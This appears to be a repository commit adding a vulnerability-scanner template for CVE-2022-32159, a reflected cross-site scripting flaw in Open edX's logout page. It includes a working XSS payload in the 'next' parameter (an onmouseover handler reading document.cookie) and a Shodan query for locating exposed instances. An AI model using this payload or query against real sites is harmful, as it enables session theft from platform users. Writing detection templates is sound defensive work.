Create CVE-2022-32159.yaml
parent
507f0c8a5e
commit
660c7d71d5
|
@ -0,0 +1,31 @@
|
|||
id: CVE-2022-32159
|
||||
|
||||
info:
|
||||
name: Open edX - Cross-site Scripting
|
||||
author: arafatansari
|
||||
severity: medium
|
||||
description: |
|
||||
Open edX platform before 2022-06-06 allows Reflected Cross-site Scripting via the "next" parameter in the logout URL.
|
||||
reference:
|
||||
- https://discuss.openedx.org/t/security-patch-for-logout-page-xss-vulnerability/7408
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32159
|
||||
metadata:
|
||||
shodan-query: http.html:"Open edX"
|
||||
verified: "true"
|
||||
tags: xss,cve,2022
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/logout?next=%208%22onmouseover=%22alert(document.cookie)'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- 'onmouseover="alert(document.cookie)'
|
||||
condition: and
|
Loading…
Reference in New Issue